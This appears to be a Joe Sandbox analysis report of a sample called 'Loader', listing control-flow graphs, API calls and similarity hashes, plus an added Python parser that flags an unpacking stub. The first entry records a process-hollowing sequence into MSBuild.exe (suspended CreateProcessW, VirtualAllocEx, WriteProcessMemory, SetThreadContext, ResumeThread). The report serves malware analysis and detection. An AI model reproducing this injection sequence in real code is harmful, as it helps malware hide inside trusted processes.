d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17898 d31b4e 17897->17898 17898->17863 18164 d32230 17899->18164 17903 d32458 17902->17903 17904 d3243f 17902->17904 17906 d324f0 17903->17906 17904->17876 17907 d32533 std::ios_base::_Init 17906->17907 17925 d327a0 17907->17925 17910 d3258a 17929 d32820 17910->17929 17926 d327bb 
std::ios_base::_Init 17925->17926 17927 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17926->17927 17928 d32578 17927->17928 17928->17910 17940 d32800 17928->17940 17930 d32837 17929->17930 17931 d327a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17930->17931 17932 d325a1 17931->17932 17933 d328a0 17932->17933 17934 d32af0 30 API calls 17933->17934 17935 d328ba 17934->17935 17941 d37974 std::ios_base::_Init 30 API calls 17940->17941 17942 d32812 17941->17942 17950 d330d9 17949->17950 17951 d330f1 17950->17951 17983 d33720 17950->17983 17951->17880 17991 d374e4 17953->17991 17957 d33217 17958 d33255 17957->17958 18012 d33ac0 17957->18012 18005 d37515 17958->18005 17976 d33615 17975->17976 18126 d34de0 17976->18126 17979 d33640 17980 d33654 17979->17980 17981 d3366f 17980->17981 18141 d36940 17980->18141 17984 d33762 17983->17984 17985 d33090 39 API calls 17984->17985 17987 d33815 17984->17987 17989 d3377d 17985->17989 17986 d33640 39 API calls 17986->17987 17987->17951 17988 d335f0 39 API calls 17990 d33790 17988->17990 17989->17988 17989->17990 17990->17986 17992 d374f3 17991->17992 17993 d374fa 17991->17993 18039 d41d3f 17992->18039 17995 d33202 17993->17995 18044 d39c58 EnterCriticalSection 17993->18044 17997 d33990 17995->17997 17998 d339b2 17997->17998 17999 d339ee 17997->17999 18000 d374e4 std::_Lockit::_Lockit 7 API calls 17998->18000 18001 d371d1 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 17999->18001 18002 d339c3 18000->18002 18003 d33a00 18001->18003 18004 d37515 std::_Lockit::~_Lockit 2 API calls 18002->18004 18003->17957 18004->17999 18013 d33aff 18012->18013 18021 d33272 18012->18021 18013->18021 18040 d4660b std::_Lockit::_Lockit 5 API calls 18039->18040 18041 d41d44 18040->18041 18042 d41d11 std::_Lockit::_Lockit EnterCriticalSection 18041->18042 18043 d41d4b 18042->18043 18043->17995 18044->17995 18129 d34e30 18126->18129 

Control-flow Graph

APIs
• CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00D60110,00D60100), ref: 00D60334
• VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00D60347
• Wow64GetThreadContext.KERNEL32(00000100,00000000), ref: 00D60365
• ReadProcessMemory.KERNELBASE(00000104,?,00D60154,00000004,00000000), ref: 00D60389
• VirtualAllocEx.KERNELBASE(00000104,?,?,00003000,00000040), ref: 00D603B4
• WriteProcessMemory.KERNELBASE(00000104,00000000,?,?,00000000,?), ref: 00D6040C
• WriteProcessMemory.KERNELBASE(00000104,00400000,?,?,00000000,?,00000028), ref: 00D60457
• WriteProcessMemory.KERNELBASE(00000104,?,?,00000004,00000000), ref: 00D60495
• Wow64SetThreadContext.KERNEL32(00000100,00430000), ref: 00D604D1
• ResumeThread.KERNELBASE(00000100), ref: 00D604E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
• String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
• API String ID: 2687962208-3857624555
• Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction ID: 8699c3233706eef83de3a593c2db31be48ad706b8424807beb0e16e2822c11cd
• Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
• Instruction Fuzzy Hash: F1B1097264064AAFDB60CF68CC80BDA77A5FF88714F158164EA0CAB341D774FA51CBA4

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: File$AddressCloseCreateHandleProcSize
• String ID: CreateFileA
• API String ID: 2547132502-1429953656
• Opcode ID: 4c7517ec2b4ed84a80a23f6ffb545f2e7db7fec9c4bef088de2e260d11bbc5b1
• Instruction ID: 9ced4854466b94e310d836d3756a39455da84b23b0bbf02b7e6ea236ac85a499
• Opcode Fuzzy Hash: 4c7517ec2b4ed84a80a23f6ffb545f2e7db7fec9c4bef088de2e260d11bbc5b1
• Instruction Fuzzy Hash: FD41B5B4D083099FCB04EFA8D4986AEBBF0EF49315F048529E899E7350D7749545CFA2

Control-flow Graph

APIs
• FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,00DC7F77,?,00D46751,00000000,00000000,00000000,00000000), ref: 00D46703
Strings
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-$ext-ms-
• API String ID: 3664257935-537541572
• Opcode ID: 5ea059118a21a2bab98ed301419ca2ecf58d7646e8a24b2bcd074a5b03cf9cdf
• Instruction ID: e5a707df0560b4bd2020fbd37777e3ea9b9e7c5905af68f184b3d023081109dc
• Opcode Fuzzy Hash: 5ea059118a21a2bab98ed301419ca2ecf58d7646e8a24b2bcd074a5b03cf9cdf
• Instruction Fuzzy Hash: CC210A32A01320ABC735AB65DC45A5A7768DB42771F2A0150FD07E7391EB70EE00DAF2

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: AddressConsoleFreeHandleModuleProc
• String ID: FreeConsole$kernel32.dll
• API String ID: 1635486814-2564406000
• Opcode ID: 2016b84e7c3406486cc17a8fcdd8eac3ba95a470cdecb385b44dbd97af8ab675
• Instruction ID: a7490486963df065302b76c098ad7f38ca6a064f4f5e8cb866b260b06e357f5f
• Opcode Fuzzy Hash: 2016b84e7c3406486cc17a8fcdd8eac3ba95a470cdecb385b44dbd97af8ab675
• Instruction Fuzzy Hash: 2C0166B0E043089FCB44EFB8D94559DBBF4EB48301F41856AE849D7351EB74A6548FA2

Control-flow Graph

APIs
• __alloca_probe_16.LIBCMT ref: 00D46EAF
• __alloca_probe_16.LIBCMT ref: 00D46F78
• __freea.LIBCMT ref: 00D46FDF
  • Part of subcall function 00D456F1: RtlAllocateHeap.NTDLL(00000000,00D47675,?,?,00D47675,00000220,?,?,?), ref: 00D45723
• __freea.LIBCMT ref: 00D46FF2
• __freea.LIBCMT ref: 00D46FFF
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
• Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
Similarity
• API ID: __freea$__alloca_probe_16$AllocateHeap
• String ID:
• API String ID: 1423051803-0
• Opcode ID: 783123bdf89d4cb1c42dfc80df6de212082a5b9fdd2d4c07e36eccd10862b833
• Instruction ID: f117788a03bf22b92fca1f6e2ed31357fbff232d0f9cbaf87a4925d3b4c0db59
• Opcode Fuzzy Hash: 783123bdf89d4cb1c42dfc80df6de212082a5b9fdd2d4c07e36eccd10862b833
• Instruction Fuzzy Hash: E851D2B2600246AFDB249F64EC81EBB7BA9EF46750F190039FD46D6111EB71DC1486B2

Control-flow Graph

                                                                                                  control_flow_graph 137 d31db0-d31e7e call d31000 * 2 GetProcAddress 142 d31e84-d31e8c 137->142 143 d31e8f-d31ecb VirtualProtect 137->143 142->143 145 d31ed1-d31ed7 call d31bd0 143->145 146 d31edc-d31ef3 call d371d1 143->146 145->146
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                                                                  • Associated: 00000000.00000002.1666244152.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666288600.0000000000D56000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666305542.0000000000D60000.00000040.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666321527.0000000000D61000.00000004.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666336222.0000000000D64000.00000002.00000001.01000000.00000003.sdmp
                                                                                                  • Associated: 00000000.00000002.1666352497.0000000000D67000.00000008.00000001.01000000.00000003.sdmp
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_d30000_Loader.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProcProtectVirtual
                                                                                                  • String ID: @$VirtualProtect
                                                                                                  • API String ID: 3759838892-29487290
                                                                                                  • Opcode ID: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a
                                                                                                  • Instruction ID: bbaaff3146b4feda22f8e542c91b294fc88216cd22da5267659f7f4bb490dbdd
                                                                                                  • Opcode Fuzzy Hash: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a
                                                                                                  • Instruction Fuzzy Hash: 5941E2B4901309DFCB04DFA9D99869EBBF0FF48304F108419E858AB350D775AA84CFA1
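
The entry at d31db0 above (GetProcAddress resolving VirtualProtect by name, then a VirtualProtect call in the following block) is the one function in this listing that changes page protections at run time, which is the shape a self-modifying or unpacking stub takes. Below is an added Python example, not Joe Sandbox code, that parses entries in this page's layout (the Control-flow Graph heading, the control_flow_graph edge text, the APIs bullets with their ref addresses and "Part of subcall function" prefixes, and the Similarity key/value bullets) into records and flags functions whose API set contains both names. The REPORT string is a constructed excerpt copying three entries from this report; labelling each record by the first block address in its control_flow_graph line is this example's own assumption, not a Joe Sandbox field.

```python
"""Parse Joe Sandbox per-function entries (control-flow graph, APIs, Similarity
fields) into records and flag the GetProcAddress + VirtualProtect stub.
Added example, not Joe Sandbox code. REPORT is a constructed excerpt copying
three entries from this report; labelling a record by the first block address in
its control_flow_graph line is this example's assumption ("unknown" if absent)."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

REPORT = """\
Control-flow Graph
control_flow_graph 137 d31db0-d31e7e call d31000 * 2 GetProcAddress 142 d31e84-d31e8c 137->142 143 d31e8f-d31ecb VirtualProtect 137->143 142->143 145 d31ed1-d31ed7 call d31bd0 143->145 146 d31edc-d31ef3 call d371d1 143->146 145->146
APIs
Strings
Similarity
• API ID: AddressProcProtectVirtual
• String ID: @$VirtualProtect
• Opcode ID: 5ad60019fe5e420dd93eb7d29772834812f2492cdbbceba85f5bb8f2b2760d4a

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32(00D3F1A0,?,00D3F355,00000000,?,?,00D3F1A0,00DC7F77,?,00D3F1A0), ref: 00D3F2A4
• TerminateProcess.KERNEL32(00000000,?,00D3F355,00000000,?,?,00D3F1A0,00DC7F77,?,00D3F1A0), ref: 00D3F2AB
• ExitProcess.KERNEL32 ref: 00D3F2BD
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• Opcode ID: 46885d46980ac885b70897950fea6915360a8ec60c2eb9e8ade476398ac9d6e5

Control-flow Graph
APIs
  • Part of subcall function 00D4D74E: GetConsoleOutputCP.KERNEL32(00DC7F77,00000000,00000000,?), ref: 00D4D7B1
• WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00D3D832,?,00D3DA94), ref: 00D4D529
• GetLastError.KERNEL32(?,00D3D832,?,00D3DA94,?,00D3DA94,?,?,?,?,?,?,?,00000000,?,?), ref: 00D4D533
Similarity
• API ID: ConsoleErrorFileLastOutputWrite
• String ID:
• Opcode ID: 5b82acec63aedeedda3033eb6f685451a9cf1b8dc17fd30296ad2e0b63565c3c
"""

# "• [Part of subcall function X: ]Name.MODULE(args), ref: ADDR" (args and comma optional)
API_RE = re.compile(r"•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                    r"(?P<name>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
KV_RE = re.compile(r"•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)")  # "• Opcode ID: ..."
CFG_START_RE = re.compile(r"control_flow_graph\s+\d+\s+(?P<start>[0-9a-f]+)-")
# API names inside the graph text are CamelCase tokens; block ranges such as
# d31e84-d31e8c, bare block numbers and the word "call" never match.
CFG_API_RE = re.compile(r"\b[A-Z][A-Za-z0-9]*[a-z][A-Za-z0-9]*\b")


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str
    subcall: str | None = None  # address of the callee the call sits in, if any


@dataclass
class FunctionEntry:
    start: str = "unknown"
    apis: list[ApiCall] = field(default_factory=list)
    cfg_apis: set[str] = field(default_factory=set)  # names seen in the graph text
    similarity: dict[str, str] = field(default_factory=dict)

    def api_names(self) -> set[str]:
        return {a.name for a in self.apis} | self.cfg_apis


def parse_report(text: str) -> list[FunctionEntry]:
    """One FunctionEntry per "Control-flow Graph" heading; the other headings only
    select which bullet pattern applies, so unknown sections are skipped."""
    entries: list[FunctionEntry] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "Control-flow Graph":
            entries.append(FunctionEntry())
            section = None
        elif not entries:
            continue
        elif line.startswith("control_flow_graph"):
            if m := CFG_START_RE.match(line):
                entries[-1].start = m["start"]
            entries[-1].cfg_apis.update(CFG_API_RE.findall(line))
        elif line in ("APIs", "Strings", "Similarity", "Memory Dump Source"):
            section = line
        elif section == "APIs" and (m := API_RE.match(line)):
            entries[-1].apis.append(ApiCall(m["name"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            entries[-1].similarity[m["key"]] = m["val"]
    return entries


def flags_dynamic_protect_change(entry: FunctionEntry) -> bool:
    """True when a function both resolves an export by name and changes page
    protection, counting calls seen in the APIs bullets or in the graph text."""
    return {"GetProcAddress", "VirtualProtect"} <= entry.api_names()


if __name__ == "__main__":
    for e in parse_report(REPORT):
        mark = "FLAG" if flags_dynamic_protect_change(e) else ""
        print(e.start, sorted(e.api_names()), e.similarity.get("Opcode ID", "")[:16], mark)
```

Of the three copied entries only d31db0 is flagged. The code-page (IsValidCodePage/GetCPInfo/GetOEMCP), LCMapString, console-write (WriteFile/GetConsoleOutputCP) and GetStdHandle/GetFileType entries listed on this page are calls the MSVC C runtime's own startup and stdio helpers make, and __freea and __alloca_probe_16 in the first API ID above are CRT symbols, so a match on those alone does not characterize the sample. The Opcode ID and Instruction Fuzzy Hash fields land in the similarity dict so the same records can be keyed by them and intersected with the records of another sample's report to find reused functions.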

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetCurrentProcess.KERNEL32(00D3F1A0,?,00D3F355,00000000,?,?,00D3F1A0,00DC7F77,?,00D3F1A0), ref: 00D3F2A4
                                                                                                  • TerminateProcess.KERNEL32(00000000,?,00D3F355,00000000,?,?,00D3F1A0,00DC7F77,?,00D3F1A0), ref: 00D3F2AB
                                                                                                  • ExitProcess.KERNEL32 ref: 00D3F2BD
                                                                                                  Similarity
                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                  • String ID:
                                                                                                  • API String ID: 1703294689-0
                                                                                                  • Opcode ID: 46885d46980ac885b70897950fea6915360a8ec60c2eb9e8ade476398ac9d6e5
                                                                                                  • Instruction ID: 89f71cc4be505f0f0b01592890a01f0c2e8de7df77a250206efe86d89299a6fa
                                                                                                  • Opcode Fuzzy Hash: 46885d46980ac885b70897950fea6915360a8ec60c2eb9e8ade476398ac9d6e5
                                                                                                  • Instruction Fuzzy Hash: C4D06736400308ABCF053F60DC0995A3F69EF44352B544425BD0596131CF719A519AB4

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 157 d4d3a4-d4d3c6 158 d4d3cc-d4d3ce 157->158 159 d4d5b9 157->159 161 d4d3d0-d4d3ef call d41ba8 158->161 162 d4d3fa-d4d41d 158->162 160 d4d5bb-d4d5bf 159->160 170 d4d3f2-d4d3f5 161->170 163 d4d423-d4d429 162->163 164 d4d41f-d4d421 162->164 163->161 166 d4d42b-d4d43c 163->166 164->163 164->166 168 d4d43e-d4d44c call d4c152 166->168 169 d4d44f-d4d45f call d4d6d1 166->169 168->169 175 d4d461-d4d467 169->175 176 d4d4a8-d4d4ba 169->176 170->160 179 d4d490-d4d4a6 call d4d74e 175->179 180 d4d469-d4d46c 175->180 177 d4d511-d4d531 WriteFile 176->177 178 d4d4bc-d4d4c2 176->178 181 d4d533-d4d539 GetLastError 177->181 182 d4d53c 177->182 184 d4d4c4-d4d4c7 178->184 185 d4d4fd-d4d50a call d4db7d 178->185 196 d4d489-d4d48b 179->196 186 d4d477-d4d486 call d4db15 180->186 187 d4d46e-d4d471 180->187 181->182 189 d4d53f-d4d54a 182->189 190 d4d4e9-d4d4fb call d4dd41 184->190 191 d4d4c9-d4d4cc 184->191 195 d4d50f 185->195 186->196 187->186 192 d4d551-d4d554 187->192 197 d4d5b4-d4d5b7 189->197 198 d4d54c-d4d54f 189->198 203 d4d4e4-d4d4e7 190->203 199 d4d557-d4d559 191->199 200 d4d4d2-d4d4df call d4dc58 191->200 192->199 195->203 196->189 197->160 198->192 204 d4d587-d4d593 199->204 205 d4d55b-d4d560 199->205 200->203 203->196 210 d4d595-d4d59b 204->210 211 d4d59d-d4d5af 204->211 208 d4d562-d4d574 205->208 209 d4d579-d4d582 call d413a0 205->209 208->170 209->170 210->159 210->211 211->170
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D4D74E: GetConsoleOutputCP.KERNEL32(00DC7F77,00000000,00000000,?), ref: 00D4D7B1
                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,?,?,00D3D832,?,00D3DA94), ref: 00D4D529
                                                                                                  • GetLastError.KERNEL32(?,00D3D832,?,00D3DA94,?,00D3DA94,?,?,?,?,?,?,?,00000000,?,?), ref: 00D4D533
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 2915228174-0
                                                                                                  • Opcode ID: 5b82acec63aedeedda3033eb6f685451a9cf1b8dc17fd30296ad2e0b63565c3c
                                                                                                  • Instruction ID: a2c8c1d967c44e73c2fd64b31afe1ad52ebf72c8395c325ebcf33c7a2a9e2316
                                                                                                  • Opcode Fuzzy Hash: 5b82acec63aedeedda3033eb6f685451a9cf1b8dc17fd30296ad2e0b63565c3c
                                                                                                  • Instruction Fuzzy Hash: E761A5B1D04119AFDF11DFA8C884AFEBBBAEF4A308F180149E944A7256D771D901CB71

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 214 d472a8-d472d0 call d474ad 217 d47495-d47496 call d4751e 214->217 218 d472d6-d472dc 214->218 223 d4749b-d4749d 217->223 219 d472df-d472e5 218->219 221 d473e1-d47400 call d3c690 219->221 222 d472eb-d472f7 219->222 233 d47403-d47408 221->233 222->219 225 d472f9-d472ff 222->225 224 d4749e-d474ac call d371d1 223->224 228 d47305-d47311 IsValidCodePage 225->228 229 d473d9-d473dc 225->229 228->229 232 d47317-d4731e 228->232 229->224 234 d47340-d4734d GetCPInfo 232->234 235 d47320-d4732c 232->235 236 d47445-d4744f 233->236 237 d4740a-d4740f 233->237 240 d473cd-d473d3 234->240 241 d4734f-d4736e call d3c690 234->241 239 d47330-d4733b 235->239 236->233 238 d47451-d4747b call d477f9 236->238 242 d47411-d47419 237->242 243 d47442 237->243 254 d4747c-d4748b 238->254 247 d4748d-d4748e call d47837 239->247 240->217 240->229 241->239 256 d47370-d47377 241->256 244 d4743a-d47440 242->244 245 d4741b-d4741e 242->245 243->236 244->237 244->243 249 d47420-d47426 245->249 255 d47493 247->255 249->244 253 d47428-d47438 249->253 253->244 253->249 254->247 254->254 255->223 257 d473a3-d473a6 256->257 258 d47379-d4737e 256->258 259 d473ab-d473b2 257->259 258->257 260 d47380-d47388 258->260 259->259 263 d473b4-d473c8 call d477f9 259->263 261 d4738a-d47391 260->261 262 d4739b-d473a1 260->262 264 d47392-d47399 261->264 262->257 262->258 263->239 264->262 264->264
                                                                                                  APIs
                                                                                                    • Part of subcall function 00D474AD: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00D474D8
                                                                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00D476B8,?,00000000,?,?,?), ref: 00D47309
                                                                                                  • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00D476B8,?,00000000,?,?,?), ref: 00D47345
                                                                                                  Similarity
                                                                                                  • API ID: CodeInfoPageValid
                                                                                                  • String ID:
                                                                                                  • API String ID: 546120528-0
                                                                                                  • Opcode ID: 0e0832de8687e93494db10365d0c96ce1025ed0c74974f690d973b71bd7cb1f7
                                                                                                  • Instruction ID: d27867159850e9a234f951731426cd8de5c8081e2f88ede937af66a9e2c5d991
                                                                                                  • Opcode Fuzzy Hash: 0e0832de8687e93494db10365d0c96ce1025ed0c74974f690d973b71bd7cb1f7
                                                                                                  • Instruction Fuzzy Hash: E4513370A083459FDB20CF35C8856BABBF5EF84304F18846ED49ACB251E7759945DBB0

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 267 d4db7d-d4dbd2 call d3a050 270 d4dbd4 267->270 271 d4dc47-d4dc57 call d371d1 267->271 273 d4dbda 270->273 275 d4dbe0-d4dbe2 273->275 276 d4dbe4-d4dbe9 275->276 277 d4dbfc-d4dc21 WriteFile 275->277 278 d4dbf2-d4dbfa 276->278 279 d4dbeb-d4dbf1 276->279 280 d4dc23-d4dc2e 277->280 281 d4dc3f-d4dc45 GetLastError 277->281 278->275 278->277 279->278 280->271 282 d4dc30-d4dc3b 280->282 281->271 282->273 283 d4dc3d 282->283 283->271
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,?,?,00D4D50F,?,00D3DA94,?,?,?,00000000), ref: 00D4DC19
                                                                                                  • GetLastError.KERNEL32(?,00D4D50F,?,00D3DA94,?,?,?,00000000,?,?,?,?,?,00D3D832,?,00D3DA94), ref: 00D4DC3F
                                                                                                  Similarity
                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 442123175-0
                                                                                                  • Opcode ID: 054fd41fdf2dc7446a651c373d937b0a4fa9d6a2025cda28175ddc003763c680
                                                                                                  • Instruction ID: 6d144dc288dbe975c0b9bdef6f4e2d79b78ddc0c0a375b09388cb3092767c805
                                                                                                  • Opcode Fuzzy Hash: 054fd41fdf2dc7446a651c373d937b0a4fa9d6a2025cda28175ddc003763c680
                                                                                                  • Instruction Fuzzy Hash: 21216D71A002199FCB19CF29DC90AE9B7FAEB8C305F1441A9E946D7251D630DE82CF74

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 284 d47192-d47197 285 d47199-d471b1 284->285 286 d471b3-d471b7 285->286 287 d471bf-d471c8 285->287 286->287 288 d471b9-d471bd 286->288 289 d471da 287->289 290 d471ca-d471cd 287->290 291 d47234-d47238 288->291 294 d471dc-d471e9 GetStdHandle 289->294 292 d471d6-d471d8 290->292 293 d471cf-d471d4 290->293 291->285 295 d4723e-d47241 291->295 292->294 293->294 296 d47216-d47228 294->296 297 d471eb-d471ed 294->297 296->291 298 d4722a-d4722d 296->298 297->296 299 d471ef-d471f8 GetFileType 297->299 298->291 299->296 300 d471fa-d47203 299->300 301 d47205-d47209 300->301 302 d4720b-d4720e 300->302 301->291 302->291 303 d47210-d47214 302->303 303->291
                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00D47081,00D5FCD8,0000000C), ref: 00D471DE
                                                                                                  • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00D47081,00D5FCD8,0000000C), ref: 00D471F0
                                                                                                  Similarity
                                                                                                  • API ID: FileHandleType
                                                                                                  • String ID:
                                                                                                  • API String ID: 3000768030-0
                                                                                                  • Opcode ID: acae383bfe3ef804deb5575cd165606986d992f0e0d21049acc72d3dc1323457
                                                                                                  • Instruction ID: d6bf97572f6b71ca46bd674f841af3c066e597c615ecccc0afb8e8816c695cf5
                                                                                                  • Opcode Fuzzy Hash: acae383bfe3ef804deb5575cd165606986d992f0e0d21049acc72d3dc1323457
                                                                                                  • Instruction Fuzzy Hash: 6811D67150CB814BC7308E7E8CC86227A95A796370B3C0759E4B6C65F1C770D946D6B5

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32 ref: 00D32038
                                                                                                  • GetModuleFileNameW.KERNEL32 ref: 00D32058
                                                                                                  Similarity
                                                                                                  • API ID: Module$FileHandleName
                                                                                                  • String ID:
                                                                                                  • API String ID: 4146042529-0
APIs
• LCMapStringEx.KERNELBASE(?,00D46F1A,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00D46527
• LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00D46F1A,?,?,-00000008,?,00000000), ref: 00D46545
Memory Dump Source
• Source File: 00000000.00000002.1666262395.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
Similarity
• API ID: String
• String ID:
• API String ID: 2568140703-0
APIs
• RtlFreeHeap.NTDLL(00000000,00000000,?,00D49A64,?,00000000,?,?,00D49704,?,00000007,?,?,00D4A04A,?,?), ref: 00D456CD
• GetLastError.KERNEL32(?,?,00D49A64,?,00000000,?,?,00D49704,?,00000007,?,?,00D4A04A,?,?), ref: 00D456D8
Memory Dump Source
